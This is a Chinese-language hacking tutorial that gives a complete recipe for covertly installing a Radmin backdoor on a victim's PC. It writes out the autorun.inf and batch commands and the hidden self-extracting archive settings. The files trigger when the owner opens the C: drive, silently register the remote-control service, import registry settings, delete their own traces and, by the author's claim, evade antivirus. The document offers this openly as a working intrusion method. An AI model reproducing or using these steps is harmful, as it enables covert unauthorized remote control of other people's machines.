這里只需要你有上傳的權(quán)限。

一共三個文件：1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解壓文件）。

思路：

全部放在C盤下。當(dāng)肉雞主人雙擊C盤時自動運行第一文件，第一文件帶動運行第二文件，同時第二運行第三運行完可正常進(jìn)入C盤。不會讓人發(fā)覺。并且里面所帶的批處理，會在最后把所有文件刪除。此時，后門卻已經(jīng)裝上去了（此法針對沒有權(quán)限運行木馬的入侵活動）。

制作：

[autorun] open=shell.bat，這個是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba，這個是shell.bat hao.exe，里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件（關(guān)鍵所在）r.bat——批處理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat，其他四個就是Radmin的文件。這個大家都會，復(fù)制過來就行。

我們再來看自解壓的處理。在解壓路徑里我們用 %systemroot%\system32，就是解壓到系統(tǒng)目錄里，并且“解壓后運行”填上我們的r.bat文件。因為這里的文件比較多，比較隱蔽。解壓模式我們選 “全部隱藏”，和 “覆蓋所有文件”！ 好了，一個不被殺毒軟件所能查殺的好后門程序就成功制作出來了！

大家不要放在文件夾里壓縮哦，要直接選上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件壓縮，這樣就行啦。

責(zé)任編輯: 雪花(TEL:（010）68476636-8008)